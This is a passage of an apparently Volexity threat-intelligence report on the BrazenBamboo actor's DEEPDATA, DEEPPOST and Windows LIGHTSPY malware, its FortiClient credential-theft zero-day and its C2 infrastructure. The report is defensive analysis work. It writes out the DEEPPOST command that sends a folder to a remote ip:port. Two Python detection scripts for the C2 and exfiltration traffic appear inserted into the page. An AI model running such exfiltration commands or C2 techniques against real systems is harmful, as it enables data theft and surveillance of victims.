malware.</em></li> <li><em>BrazenBamboo is the threat actor behind development of the LIGHTSPY malware family.</em></li> <li><em>LIGHTSPY variants have been discovered for all major operating systems, including iOS, and Volexity has recently discovered a new Windows variant.</em></li> </ul> <p style="font-weight: 400;">In July 2024, Volexity identified exploitation of a zero-day credential disclosure vulnerability in Fortinet’s Windows VPN client that allowed credentials to be stolen from the memory of the client’s process. This vulnerability was discovered while analyzing a recent sample of the DEEPDATA malware family. DEEPDATA is a modular post-exploitation tool for the Windows operating system that is used to gather a wide range of information from target devices. Analysis of the sample revealed a plugin that was designed to extract credentials from FortiClient VPN client process memory. 
On July 18, 2024, Volexity notified Fortinet about this vulnerability. Since Volexity's initial discovery and reporting to Fortinet, <a href="https://www.threatfabric.com/blogs/lightspy-implant-for-ios">ThreatFabric</a> and <a href="https://blogs.blackberry.com/en/2024/11/lightspy-apt41-deploys-advanced-deepdata-framework-in-targeted-southern-asia-espionage-campaign">BlackBerry</a> have each published reports that cover different aspects of some of the content discussed in this post.</p> <p style="font-weight: 400;">Volexity attributes the development of DEEPDATA to a Chinese state-affiliated threat actor that it tracks as BrazenBamboo. Volexity has observed links between BrazenBamboo and three distinct malware families: LIGHTSPY, DEEPDATA, and DEEPPOST. Volexity tracks BrazenBamboo as the <em>developer</em> of these malware families and not necessarily one of the operators using them (there may be many). Volexity has also identified a new Windows variant of LIGHTSPY that had not been publicly documented at the time of writing.</p> <p style="font-weight: 400;">This blog post details the use and functionality of DEEPDATA, with a focus on zero-day exploitation of the FortiClient vulnerability, and how DEEPPOST is used to exfiltrate files from compromised systems. It also looks at the recently discovered Windows variant of LIGHTSPY, including notable changes, and the wider command-and-control (C2) infrastructure of the BrazenBamboo threat actor.</p> <h2>Malware Analysis</h2> <p style="font-weight: 400;">Volexity’s analysis began with the discovery of an archive file named <code>deepdata.zip</code> (SHA256: <code>666a4c569d435d0e6bf9fa4d337d1bf014952b42cc6d20e797db6c9df92dd724</code>) that is tied to BrazenBamboo. This archive contains several files that are part of two Windows malware families, which Volexity refers to as DEEPDATA and DEEPPOST. Each malware family is analyzed in the sections that follow. 
Volexity also separately obtained and analyzed a new Windows variant of LIGHTSPY that is described further below.</p> <h3>DEEPDATA</h3> <p style="font-weight: 400;">As previously mentioned, DEEPDATA is a modular post-exploitation tool for Windows that facilitates collection of sensitive information from a compromised system. This tool must be run from the command line of a system by an attacker. The DEEPDATA malware elements include the following:</p> <table class="table table--style-2" style="font-weight: 400;"> <thead> <tr> <td width="83"><strong>Filename</strong></td> <td width="319"><strong>Description</strong></td> </tr> </thead> <tbody> <tr> <td width="83"><code>data.dll</code></td> <td width="319">DEEPDATA Loader</td> </tr> <tr> <td width="83"><code>mod.dat</code></td> <td width="319">DEEPDATA Virtual File System (VFS)</td> </tr> <tr> <td width="83"><code>readme.txt</code></td> <td width="319">File containing DEEPDATA Execution Options</td> </tr> </tbody> </table> <p style="font-weight: 400;">The <code>readme.txt</code> file describes how to execute the DEEPDATA loader, along with available parameters and a decryption key.</p> <p><img decoding="async" class="aligncenter size-full wp-image-3353" src="https://www.volexity.com/wp-content/uploads/2024/11/image001.png" alt="" width="1254" height="540" srcset="https://www.volexity.com/wp-content/uploads/2024/11/image001.png 1254w, https://www.volexity.com/wp-content/uploads/2024/11/image001-300x129.png 300w, https://www.volexity.com/wp-content/uploads/2024/11/image001-1024x441.png 1024w, https://www.volexity.com/wp-content/uploads/2024/11/image001-768x331.png 768w" sizes="(max-width: 1254px) 100vw, 1254px" /></p> <p style="font-weight: 400;">The <code>key</code> parameter is used by the DEEPDATA loader file to decrypt and load the “core” components of the DEEPDATA malware family stored in the local VFS file (<code>mod.dat</code>). 
These components will always execute and are not dependent on additional parameters passed on the command line.</p> <p style="font-weight: 400;">The core components of DEEPDATA include the following files:</p> <table class="table table--style-2" style="font-weight: 400;"> <thead> <tr> <td width="174"><strong> Filename</strong></td> <td width="450"><strong>Purpose</strong></td> </tr> </thead> <tbody> <tr> <td width="174"><code>frame.dll</code></td> <td width="450">Shellcode – core orchestrator for plugin execution</td> </tr> <tr> <td width="174"><code>ffmpeg.dll</code></td> <td width="450">Contains <a href="https://www.zdnet.com/article/malware-authors-are-still-abusing-the-heavens-gate-technique/">Heaven’s Gate</a> code to load 32-bit code in 64-bit processes</td> </tr> <tr> <td width="174"><code>vertdll.dll</code></td> <td width="450">Collects event logs</td> </tr> <tr> <td width="174"><code>iumdll.dll</code></td> <td width="450">Library used to collect locally stored WeChat data</td> </tr> <tr> <td width="174"><code>ucrtbase_enclave.dll</code></td> <td width="450">Library used to collect locally stored Feishu data</td> </tr> <tr> <td width="174"><code>d3dcompiler_47.dll</code></td> <td width="450">Checks the running instant messaging apps (Line, Feishu, WeChat)</td> </tr> </tbody> </table> <p style="font-weight: 400;">The architecture of DEEPDATA’s loader, core, and plugins is shown below.</p> <p><img decoding="async" class="aligncenter size-full wp-image-3354" src="https://www.volexity.com/wp-content/uploads/2024/11/image002.png" alt="" width="1260" height="879" srcset="https://www.volexity.com/wp-content/uploads/2024/11/image002.png 1260w, https://www.volexity.com/wp-content/uploads/2024/11/image002-300x209.png 300w, https://www.volexity.com/wp-content/uploads/2024/11/image002-1024x714.png 1024w, https://www.volexity.com/wp-content/uploads/2024/11/image002-768x536.png 768w" sizes="(max-width: 1260px) 100vw, 1260px" /></p> <p style="font-weight: 400;">The core 
components are always included in the VFS files, but Volexity was only able to find <code>frame.dll</code> stored on the C2 servers. While DEEPDATA plugins are stored in the VFS files, they are also stored as their own dedicated files on the C2 servers; they can be loaded from either location. The DEEPDATA plugins in the VFS are decrypted using the same key as the other components in the VFS.</p> <p style="font-weight: 400;">The overall plugin logic is the same as that seen in LIGHTSPY malware samples, with the following exported functions used by the core orchestrator:</p> <ul> <li><code>ExecuteCommand</code></li> <li><code>GetPluginCommandID</code></li> <li><code>GetPluginName</code></li> <li><code>GetPluginVersion</code></li> </ul> <p style="font-weight: 400;">DEEPDATA maintains configuration data within the VFS file with the following files stored in an encrypted state:</p> <table class="table table--style-2" style="font-weight: 400;"> <thead> <tr> <td width="100"><strong>Filename</strong></td> <td width="337"><strong>Description</strong></td> </tr> </thead> <tbody> <tr> <td width="100"><code>config.json</code></td> <td width="337">Contains DEEPDATA configuration information</td> </tr> <tr> <td width="100"><code>manifest.json</code></td> <td width="337">Contains DEEPDATA plugin information</td> </tr> <tr> <td width="100"><code>manifest1.json</code></td> <td width="337">Contains DEEPDATA plugin information</td> </tr> <tr> <td width="100"><code>date.ini</code></td> <td width="337">Purpose unclear, contains a single byte of <code>0x30</code></td> </tr> </tbody> </table> <p style="font-weight: 400;">The <code>manifest.json</code> file is also stored on the C2 server but in an unencrypted state.</p> <p style="font-weight: 400;">Volexity identified a total of 12 unique plugins for DEEPDATA, which are summarized below:</p> <table class="table table--style-2" style="font-weight: 400; width: 644px;"> <thead> <tr> <td style="width: 144px;" width="123"><strong>Plugin 
Name</strong></td> <td style="width: 500px;" width="500"><strong>Plugin Capabilities</strong></td> </tr> </thead> <tbody> <tr> <td style="width: 144px;" width="123"><code>AccountInfo</code></td> <td style="width: 500px;" width="500">Steal credentials from 18 different sources on the compromised device.</td> </tr> <tr> <td style="width: 144px;" width="123"><code>AppData</code></td> <td style="width: 500px;" width="500">Collect data from WeChat, WhatsApp and Signal on the compromised device.</td> </tr> <tr> <td style="width: 144px;" width="123"><code>Audio</code></td> <td style="width: 500px;" width="500">Record audio on compromised devices.</td> </tr> <tr> <td style="width: 144px;" width="123"><code>ChatIndexedDb</code></td> <td style="width: 500px;" width="500">Steal databases from WhatsApp and Zalo chat clients.</td> </tr> <tr> <td style="width: 144px;" width="123"><code><strong>FortiClient</strong></code></td> <td style="width: 500px;" width="500"><strong>Extract credentials and server information from process memory of FortiClient VPN processes. 
</strong></td> </tr> <tr> <td style="width: 144px;" width="123"><code>Outlook</code></td> <td style="width: 500px;" width="500">Collect contacts and emails from local Microsoft Outlook instances.</td> </tr> <tr> <td style="width: 144px;" width="123"><code>SocialSoft</code></td> <td style="width: 500px;" width="500">Steal data from WeChat, Line, QQ, DingDing, Skype, Telegram, and Feishu applications.</td> </tr> <tr> <td style="width: 144px;" width="123"><code>SoftwareList</code></td> <td style="width: 500px;" width="500">List installed software, folders, and files recursively from a base location.</td> </tr> <tr> <td style="width: 144px;" width="123"><code>SystemInfo</code></td> <td style="width: 500px;" width="500">Gather basic enumeration information from the compromised device.</td> </tr> <tr> <td style="width: 144px;" width="123"><code>TdMonitor</code></td> <td style="width: 500px;" width="500">Hook Telegram to retrieve messages from the application.</td> </tr> <tr> <td style="width: 144px;" width="123"><code>WebBrowser</code></td> <td style="width: 500px;" width="500">Collect history, cookies, and passwords from Firefox, Chrome, Opera, and Edge web browsers.</td> </tr> <tr> <td style="width: 144px;" width="123"><code>WifiList</code></td> <td style="width: 500px;" width="500">Collect details of stored WiFi keys and nearby hotspots.</td> </tr> </tbody> </table> <p style="font-weight: 400;">As shown above, DEEPDATA supports a wide range of functionality to extract data from victims’ systems. The observed functionality of several plugins is commonly seen and includes items typically stolen from victim systems. However, Volexity noted the <code><strong>FortiClient</strong></code> plugin was uncommon and investigated it further. Volexity found the FortiClient plugin was included through a library with the filename <code>msenvico.dll</code>. 
This plugin was found to exploit a zero-day vulnerability in the Fortinet VPN client on Windows that allows it to extract the user’s credentials from the memory of the client’s process.</p> <p style="font-weight: 400;">As seen in the code snippet below, the FortiClient plugin looks for the username, password, remote gateway, and port in two different JSON objects in memory.</p> <p><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-3355" src="https://www.volexity.com/wp-content/uploads/2024/11/image003.png" alt="" width="638" height="378" srcset="https://www.volexity.com/wp-content/uploads/2024/11/image003.png 638w, https://www.volexity.com/wp-content/uploads/2024/11/image003-300x178.png 300w" sizes="auto, (max-width: 638px) 100vw, 638px" /></p> <p style="font-weight: 400;">This is similar to a previously documented vulnerability <a href="https://www.linkedin.com/pulse/extracting-clear-text-passwords-from-running-hacking-korznikov/">identified in 2016</a>, where credentials could be recovered from memory at hardcoded offsets. The previous vulnerability does not have an associated CVE.</p> <p style="font-weight: 400;">Volexity verified the presence of these JSON objects in memory and confirmed this approach works against the latest version available at the time of discovery (v7.4.0). Notably, the same approach does not work against older versions of the Fortinet VPN client. Volexity reported this vulnerability to Fortinet on July 18, 2024, and Fortinet acknowledged the issue on July 24, 2024. At the time of writing, this issue remains unresolved and Volexity is not aware of an assigned CVE number.</p> <h3>DEEPPOST</h3> <p style="font-weight: 400;">DEEPPOST is a post-exploitation data exfiltration tool used to send files to a remote system. 
The following sample was analyzed:</p> <table class="table--style-1" style="font-weight: 400;"> <tbody> <tr> <td width="312"><strong>Name(s)</strong></td> <td width="312">localupload.exe</td> </tr> <tr> <td width="312"><strong>Size</strong></td> <td width="312">618.5KB (633344 Bytes)</td> </tr> <tr> <td width="312"><strong>File Type</strong></td> <td width="312">application/x-dosexec</td> </tr> <tr> <td width="312"><strong>MD5</strong></td> <td width="312">533297a7084039bf6bda702b752e6b82</td> </tr> <tr> <td width="312"><strong>SHA1</strong></td> <td width="312">20214e2e93b1bb37108aa1b8666f6406fabca8a0</td> </tr> <tr> <td width="312"><strong>SHA256</strong></td> <td width="312">f4e72145e761bcc8226353bb121eb8e549dc0000c6535bfa627795351037dc8e</td> </tr> <tr> <td width="312"><strong>VirusTotal First Submitted</strong></td> <td width="312">N/A</td> </tr> </tbody> </table> <p style="font-weight: 400;">DEEPPOST supports the following syntax:</p> <blockquote> <p style="font-weight: 400;"><code>localupload.exe  c:\data_to_exfiltrate\  ip:port</code></p> </blockquote> <p style="font-weight: 400;">Exfiltration is performed via HTTPS to a hardcoded API endpoint, <code>/api/third/file/upload/</code>, usually on port 29983 (although this is not a default and would be set by the operator at the command line).</p> <h3>LIGHTSPY Background</h3> <p style="font-weight: 400;">The LIGHTSPY malware family was publicly documented in 2020, when <a href="https://securelist.com/ios-exploit-chain-deploys-lightspy-malware/96407/">Kaspersky</a> and <a href="https://documents.trendmicro.com/assets/Tech-Brief-Operation-Poisoned-News-Hong-Kong-Users-Targeted-with-Mobile-Malware-via-Local-News-Links.pdf">Trend Micro</a> reported on a mobile malware campaign targeting individuals in Hong Kong. 
More recently, <a href="https://www.lookout.com/threat-intelligence/article/wyrmspy-dragonegg-surveillanceware-apt41">Lookout</a> and <a href="https://www.threatfabric.com/blogs/lightspy-mapt-mobile-payment-system-attack#attribution">ThreatFabric</a> discussed LIGHTSPY mobile malware campaigns. Lookout linked malware they call “DragonEgg” (LIGHTSPY) to another malware family, WyrmSpy, and to a Department of Justice <a href="https://www.justice.gov/opa/pr/seven-international-cyber-defendants-including-apt41-actors-charged-connection-computer">indictment</a> regarding APT41. The macOS variant of LIGHTSPY was discussed by <a href="https://www.huntress.com/blog/lightspy-malware-variant-targeting-macos">Huntress</a> and <a href="https://www.threatfabric.com/blogs/lightspy-implant-for-macos#infrastructure">ThreatFabric</a>, with the latter also detailing some associated C2 management infrastructure.</p> <p style="font-weight: 400;">To summarize what is known and reported, LIGHTSPY is a multi-platform malware family with documented variants for Android, iOS, and macOS. <a href="https://securelist.com/ios-exploit-chain-deploys-lightspy-malware/96407/">Kaspersky</a> and <a href="https://www.threatfabric.com/blogs/lightspy-implant-for-macos">ThreatFabric</a> previously identified references to the existence of variants for Windows, Linux, and routers, but they did not document further analysis.</p> <p style="font-weight: 400;">Volexity was able to retrieve copies of LIGHTSPY written specifically for Windows. In contrast to other LIGHTSPY variants, the Windows variant was not encoded with the same incremental XOR algorithm. Rather, it was encoded with a more complex algorithm that also included padding at the beginning of the files. The architecture for the Windows variant of LIGHTSPY is different from other documented OS variants. This variant is delivered by an installer that drops a library to execute shellcode in memory. 
The shellcode downloads and decodes the orchestrator component from the C2 server (<code>pic32.png</code> for x86 and <code>pic64.png</code> for x64 architecture).</p> <p style="font-weight: 400;">The loader used for these samples is <code>BH_A006</code>, which has <a href="https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/space-pirates-tools-and-connections/#id3-6">historically been used</a> to load other malware families. It is not clear whether this is a commercially available loader or evidence of shared development capabilities across different operators. A summary of the execution chain is below.</p> <p><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-3356" src="https://www.volexity.com/wp-content/uploads/2024/11/image004.png" alt="" width="1570" height="790" srcset="https://www.volexity.com/wp-content/uploads/2024/11/image004.png 1570w, https://www.volexity.com/wp-content/uploads/2024/11/image004-300x151.png 300w, https://www.volexity.com/wp-content/uploads/2024/11/image004-1024x515.png 1024w, https://www.volexity.com/wp-content/uploads/2024/11/image004-768x386.png 768w, https://www.volexity.com/wp-content/uploads/2024/11/image004-1536x773.png 1536w" sizes="auto, (max-width: 1570px) 100vw, 1570px" /></p> <p style="font-weight: 400;">On first execution, the LIGHTSPY <code>orchestrator</code> sends a 102-byte UDP packet starting with <code>0x1A5F2E1</code> followed by random bytes. LIGHTSPY expects the server to reply with a packet starting with <code>0x2A5F2E1</code>. If the server replies properly, an <code>account.bin</code> file is created that contains the server answer, which has the same format as a MAC address and is internally named "<code>broadband account mac</code>". If the file already exists, the DNS request is not performed. 
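</p> <p style="font-weight: 400;">The UDP handshake just described can be matched in captured traffic. The detector below is an added example written for this post, not Volexity or LIGHTSPY code; it assumes each marker is a 32-bit value (<code>0x01A5F2E1</code> / <code>0x02A5F2E1</code>) and, because the byte order is not stated, checks both encodings. The datagrams it runs over are constructed.</p>

```python
"""Detector for the LIGHTSPY Windows UDP handshake described in the post.

Added example, not code from Volexity or from the malware.  Facts taken from
the post: a 102-byte client datagram beginning with 0x1A5F2E1 followed by
random bytes, answered by a server datagram beginning with 0x2A5F2E1.
Assumption made here: each marker is a 32-bit value (0x01A5F2E1 and
0x02A5F2E1); the byte order is not given, so both encodings are matched.
"""
from __future__ import annotations

import os
from dataclasses import dataclass
from typing import Optional

BEACON_MARKER = 0x01A5F2E1   # client to server, first datagram (assumed 32-bit)
REPLY_MARKER = 0x02A5F2E1    # server to client answer (assumed 32-bit)
BEACON_LEN = 102             # total datagram length stated in the post


def marker_encodings(value: int) -> tuple[bytes, bytes]:
    """Little- and big-endian encodings of a marker, since the post gives neither."""
    return value.to_bytes(4, "little"), value.to_bytes(4, "big")


@dataclass(frozen=True)
class Datagram:
    src: str       # "ip:port" of the sender
    dst: str       # "ip:port" of the receiver
    payload: bytes


def classify(dg: Datagram) -> Optional[str]:
    """Label one datagram: 'beacon', 'beacon-odd-length', 'reply', or None if unrelated."""
    head = dg.payload[:4]
    if head in marker_encodings(BEACON_MARKER):
        # Marker matches but the length does not: still worth a look, lower confidence.
        return "beacon" if len(dg.payload) == BEACON_LEN else "beacon-odd-length"
    if head in marker_encodings(REPLY_MARKER):
        return "reply"
    return None


def find_handshakes(flow: list[Datagram]) -> list[dict]:
    """Pair each suspected beacon with the first reply travelling back on the same flow.

    Unanswered beacons are reported too: the post says account.bin is only written
    after a proper reply, so an unanswered beacon is an implant that has not yet
    completed its first check-in.
    """
    findings: list[dict] = []
    awaiting: dict[tuple[str, str], int] = {}   # (server, client) to index into findings
    for dg in flow:
        kind = classify(dg)
        if kind is None:
            continue
        if kind.startswith("beacon"):
            findings.append({"client": dg.src, "server": dg.dst, "kind": kind, "answered": False})
            awaiting[(dg.dst, dg.src)] = len(findings) - 1
        elif (dg.src, dg.dst) in awaiting:
            idx = awaiting.pop((dg.src, dg.dst))
            findings[idx]["answered"] = True
            findings[idx]["reply_len"] = len(dg.payload)
    return findings


def sample_flow() -> list[Datagram]:
    """Constructed traffic: a DNS-shaped query, an answered beacon, and a truncated beacon."""
    client, c2, resolver = "10.0.0.5:49152", "203.0.113.10:5353", "10.0.0.1:53"
    beacon = BEACON_MARKER.to_bytes(4, "little") + os.urandom(BEACON_LEN - 4)
    # The post says the answer is MAC-address shaped; six constructed bytes follow the marker.
    reply = REPLY_MARKER.to_bytes(4, "little") + bytes.fromhex("0242ac110002")
    short_beacon = BEACON_MARKER.to_bytes(4, "big") + b"\x00" * 12
    dns_like = b"\x12\x34\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00" + b"\x07example\x03com\x00\x00\x01\x00\x01"
    return [
        Datagram(client, resolver, dns_like),
        Datagram(client, c2, beacon),
        Datagram(c2, client, reply),
        Datagram("10.0.0.9:50000", c2, short_beacon),
    ]


if __name__ == "__main__":
    for finding in find_handshakes(sample_flow()):
        print(finding)
```

<p style="font-weight: 400;">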
This UDP handshake is unique to the Windows variant.</p> <p style="font-weight: 400;">Like its counterparts, the Windows variant of LIGHTSPY uses WebSocket and HTTPS for communication, with WebSocket used for most JSON-based communications and HTTPS for exfiltration. Notably, the user-agent string for HTTPS requests is copied verbatim from the macOS variant, as shown below.</p> <p><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-3357" src="https://www.volexity.com/wp-content/uploads/2024/11/image005.png" alt="" width="2146" height="448" srcset="https://www.volexity.com/wp-content/uploads/2024/11/image005.png 2146w, https://www.volexity.com/wp-content/uploads/2024/11/image005-300x63.png 300w, https://www.volexity.com/wp-content/uploads/2024/11/image005-1024x214.png 1024w, https://www.volexity.com/wp-content/uploads/2024/11/image005-768x160.png 768w, https://www.volexity.com/wp-content/uploads/2024/11/image005-1536x321.png 1536w, https://www.volexity.com/wp-content/uploads/2024/11/image005-2048x428.png 2048w" sizes="auto, (max-width: 2146px) 100vw, 2146px" /></p> <p style="font-weight: 400;">The <code>orchestrator</code> expects all plugins to export the following functions:</p> <ul> <li><code>ExecuteCommand</code></li> <li><code>GetPluginCommandID</code></li> <li><code>GetPluginName</code></li> <li><code>Initial</code></li> <li><code>StopCommand</code></li> <li><code>Time</code></li> <li><code>UnInitial</code></li> </ul> <p style="font-weight: 400;">Unlike the macOS variant, most of the code in the Windows variant is executed in memory. 
The LIGHTSPY Windows plugins are summarized below:</p> <table class="table table--style-2" style="font-weight: 400;"> <thead> <tr> <td width="113"><strong>Plugin Name</strong></td> <td width="510"><strong>Purpose</strong></td> </tr> </thead> <tbody> <tr> <td width="113"><code>Audio</code></td> <td width="510">Records audio using the <code>libavcodev</code> library</td> </tr> <tr> <td width="113"><code>Browser</code></td> <td width="510">Collects cookies, history, stored credentials, and bookmarks from web browsers</td> </tr> <tr> <td width="113"><code>FileManager</code></td> <td width="510">Provides CRUD operations for files on the device and convenience methods for uploading data to the C2 server</td> </tr> <tr> <td width="113"><code>Keyboard</code></td> <td width="510">Records keystrokes</td> </tr> <tr> <td width="113"><code>Screen</code></td> <td width="510">Records the user’s screen using the <code>libavcodev</code> library</td> </tr> <tr> <td width="113"><code>Software</code></td> <td width="510">Collects information on installed software and manages services</td> </tr> <tr> <td width="113"><code>Terminal</code></td> <td width="510">Provides a remote shell for the threat actor to execute commands</td> </tr> <tr> <td width="113"><code>Video</code></td> <td width="510">Records webcam and audio from the infected device</td> </tr> </tbody> </table> <h2>Infrastructure</h2> <h3>DEEPDATA C2 Infrastructure</h3> <p style="font-weight: 400;">At the time of analysis, there were six C2 servers serving DEEPDATA payloads and hosting DEEPDATA-related management applications. 
These servers were configured for DEEPDATA usage as follows:</p> <table class="table table--style-2" style="font-weight: 400;"> <thead> <tr> <td width="75"><strong>Port</strong></td> <td width="314"><strong>Function</strong></td> <td width="234"><strong>Technology</strong></td> </tr> </thead> <tbody> <tr> <td width="75">28443</td> <td width="314">DEEPDATA operator application, HTML title “spack-info”</td> <td width="234">Nginx 1.14.0, Django REST Framework</td> </tr> <tr> <td width="75">28992</td> <td width="314">Hosts the various DEEPDATA plugins &amp; config files</td> <td width="234">Nginx 1.14.0</td> </tr> <tr> <td width="75">28993</td> <td width="314">Communication channel for DEEPDATA implants/plugins</td> <td width="234">Nginx 1.14.0, Django REST Framework</td> </tr> </tbody> </table> <p style="font-weight: 400;">Three of the six hosts were also running an API on port 48993 that, based on its endpoints, appeared to be used for managing an instance of the web-crawling framework <a href="https://github.com/scrapy/scrapy">Scrapy</a>.</p> <p style="font-weight: 400;">Volexity also identified four “keyboard-walk”-style strings used by BrazenBamboo in the URL patterns for DEEPDATA infrastructure:</p> <ul> <li><code>qweasdzxc</code></li> <li><code>qazxswedcvfr</code></li> <li><code>asdgdsfdsfasd</code></li> <li><code>asdgdsfee</code></li> </ul> <p style="font-weight: 400;">One DEEPDATA C2 server had an API endpoint serving a developer change log for the malware. This log was written in Chinese, and the most recent entry was from October 2023; the oldest entry was April 2022. A translated version of the change log is provided in the <a href="#Appendix2">Appendix</a>.</p> <h3>LIGHTSPY C2 Infrastructure</h3> <p style="font-weight: 400;">At the time of analysis, there were a total of 26 active hosts serving LIGHTSPY payloads. They were always hosted on a URL path starting with the string <code>963852741</code>. 
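</p> <p style="font-weight: 400;">The URL strings and ports above can be turned into proxy-log checks. The script below is an added example written for this post, not Volexity tooling; its indicators are the DEEPDATA ports and keyboard-walk strings listed in this section, the LIGHTSPY <code>963852741</code> path prefix, and the DEEPPOST upload endpoint described earlier, while the log format, timestamps and TEST-NET hosts are constructed.</p>

```python
"""URL and port checks for the BrazenBamboo infrastructure described in the post,
run over constructed proxy log lines.

Added example, not Volexity code.  Indicators come from the post: the DEEPPOST
upload endpoint, the three DEEPDATA C2 ports, the four keyboard-walk URL strings
and the LIGHTSPY 963852741 path prefix.  The log format, hosts and timestamps are
constructed for the demo.
"""
from __future__ import annotations

from urllib.parse import urlsplit

DEEPPOST_UPLOAD_PATH = "/api/third/file/upload/"
DEEPDATA_C2_PORTS = {
    28443: "operator application",
    28992: "plugin and config hosting",
    28993: "implant communication channel",
}
KEYBOARD_WALK_TOKENS = ("qweasdzxc", "qazxswedcvfr", "asdgdsfdsfasd", "asdgdsfee")
LIGHTSPY_PATH_PREFIX = "/963852741"


def check_url(method: str, url: str) -> list[tuple[str, str]]:
    """Return (rule, confidence) pairs for one request.

    Path-based rules carry the confidence; a port match on its own is low, because
    the post notes the DEEPPOST port is operator-chosen and high ports are common.
    """
    parts = urlsplit(url)
    path = parts.path or "/"
    hits: list[tuple[str, str]] = []
    if path == DEEPPOST_UPLOAD_PATH:
        # The post describes exfiltration to this endpoint; an upload is expected to be a POST.
        hits.append(("DEEPPOST file upload endpoint", "high" if method.upper() == "POST" else "medium"))
    if path.startswith(LIGHTSPY_PATH_PREFIX):
        hits.append(("LIGHTSPY payload path prefix", "high"))
    lowered = path.lower()
    for token in KEYBOARD_WALK_TOKENS:
        if token in lowered:
            hits.append((f"DEEPDATA keyboard-walk URL string '{token}'", "medium"))
    port = parts.port
    if port in DEEPDATA_C2_PORTS:
        confidence = "medium" if hits else "low"
        hits.append((f"DEEPDATA C2 port {port} ({DEEPDATA_C2_PORTS[port]})", confidence))
    return hits


def scan_log(lines: list[str]) -> list[dict]:
    """Parse 'timestamp client method url status' lines and collect rule hits; malformed lines are skipped."""
    findings: list[dict] = []
    for number, line in enumerate(lines, 1):
        fields = line.split()
        if len(fields) != 5:
            continue
        timestamp, client, method, url, _status = fields
        for rule, confidence in check_url(method, url):
            findings.append({
                "line": number, "time": timestamp, "client": client,
                "url": url, "rule": rule, "confidence": confidence,
            })
    return findings


# Constructed log lines (TEST-NET addresses); line 4 is benign and line 5 is malformed.
SAMPLE_LOG = [
    "2024-07-18T09:12:03Z 10.0.0.5 GET https://203.0.113.10:28992/qweasdzxc/manifest.json 200",
    "2024-07-18T09:12:09Z 10.0.0.5 POST https://203.0.113.10:29983/api/third/file/upload/ 200",
    "2024-07-18T09:13:44Z 10.0.0.7 GET https://198.51.100.20/963852741/pic64.png 200",
    "2024-07-18T09:14:00Z 10.0.0.9 GET https://www.example.com/search?q=qwerty 200",
    "2024-07-18T09:14:30Z 10.0.0.9 truncated line",
    "2024-07-18T09:15:30Z 10.0.0.5 GET https://203.0.113.10:28443/ 200",
]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding["line"], finding["confidence"], finding["rule"], finding["url"])
```

<p style="font-weight: 400;">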
These servers host various artifacts used in both the development &amp; deployment of LIGHTSPY, including manifest files indicating the current version available for download. The last-modified times of these manifest files indicated that LIGHTSPY’s development began in 2019 and continued to be updated into 2024.</p> <p style="font-weight: 400;">The LIGHTSPY C2 servers are less uniform than DEEPDATA’s, but generally the plugins are hosted on ports 52202, 43202, or 54602. The C2 management infrastructure is hosted on nearby ports (generally 43201, 53501, or 59501) but uses different starting strings for the URL paths:</p> <ul> <li><code>963852iuy</code></li> <li><code>963852poi</code></li> </ul> <h3>Other BrazenBamboo C2 Infrastructure</h3> <p style="font-weight: 400;">BrazenBamboo infrastructure also hosts other applications not directly linked to the LIGHTSPY and DEEPDATA malware families. Many are built using the <a href="https://vuejs.org/">Vue</a> framework and use Vue’s <a href="https://router.vuejs.org/guide/advanced/lazy-loading.html">lazy loading</a> mechanism to import JavaScript and CSS components on demand and reduce load times. ThreatFabric’s <a href="https://www.threatfabric.com/blogs/lightspy-implant-for-macos">report</a> covered some of the interesting aspects of these components. This functionality also reveals evidence of additional unreported capabilities of the BrazenBamboo threat actor, including the following:</p> <ul> <li>A “Reptile” email theft platform</li> <li>A proxy generation platform</li> <li>A big-data-style analysis platform for stolen data, conveniently named 联网大数据综合分析平台 (English translation: Internet Big Data Comprehensive Analysis Platform)</li> <li>Several configurable delivery methods, which are shown below. 
Another version of this panel listed the vulnerability attack as the “0day attack” type.<img loading="lazy" decoding="async" class="aligncenter size-full wp-image-3358" src="https://www.volexity.com/wp-content/uploads/2024/11/image006.png" alt="" width="544" height="211" srcset="https://www.volexity.com/wp-content/uploads/2024/11/image006.png 544w, https://www.volexity.com/wp-content/uploads/2024/11/image006-300x116.png 300w" sizes="auto, (max-width: 544px) 100vw, 544px" /></li> </ul> <p style="font-weight: 400;">There is substantial wording in these applications that would align with a domestic surveillance intent for these capabilities. The user management aspects of the panel also contain wording that suggests this tooling is used by multiple third parties, such as requirements to input an organization when registering a user and the extensive documentation on how to use the platform.</p> <h2>Attribution &amp; Overlaps</h2> <h3>DEEPDATA and LIGHTSPY</h3> <p style="font-weight: 400;">The DEEPDATA malware family has several overlaps with the LIGHTSPY malware family:</p> <ul> <li>Plugin file and export function names</li> <li>Shared program database (PDB) development paths</li> <li>Shared JSON formatting for C2 communications</li> <li>Similar formats for JSON configuration files</li> <li>Similar plugin code execution flow:</li> </ul> <p><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-3359" src="https://www.volexity.com/wp-content/uploads/2024/11/image007.png" alt="" width="1392" height="556" srcset="https://www.volexity.com/wp-content/uploads/2024/11/image007.png 1392w, https://www.volexity.com/wp-content/uploads/2024/11/image007-300x120.png 300w, https://www.volexity.com/wp-content/uploads/2024/11/image007-1024x409.png 1024w, https://www.volexity.com/wp-content/uploads/2024/11/image007-768x307.png 768w" sizes="auto, (max-width: 1392px) 100vw, 1392px" /></p> <p style="font-weight: 400; text-align: center;"><em>LIGHTSPY (left) and DEEPDATA 
(right) <code>Audio.dll</code> Plugins</em></p> <p style="font-weight: 400;">The DEEPDATA and LIGHTSPY C2 infrastructure also has several overlaps:</p> <ul> <li>Historically shared the same IP address for hosting plugins</li> <li>Shared TLS certificates</li> <li>Shared URL patterns for operator panels</li> <li>Shared operator applications across C2 servers</li> </ul> <p style="font-weight: 400;">Volexity assesses with a high degree of confidence that these two malware families are developed by related entities and are suitable to be clustered under the same threat actor alias.</p> <h3>Public Reporting Overlaps</h3> <p style="font-weight: 400;">Several C2 IP addresses mentioned in public reporting have overlaps with DEEPDATA infrastructure, including the following:</p> <table class="table table--style-2" style="font-weight: 400; width: 654px;" width="654"> <thead> <tr> <td width="115"><strong>IP Address</strong></td> <td width="275"><strong>Mention in Public Reports </strong></td> <td width="264"><strong>Overlaps</strong></td> </tr> </thead> <tbody> <tr> <td width="115"><code>103.27.109[.]217</code></td> <td width="275">Huntress’s &amp; ThreatFabric’s macOS reports</td> <td 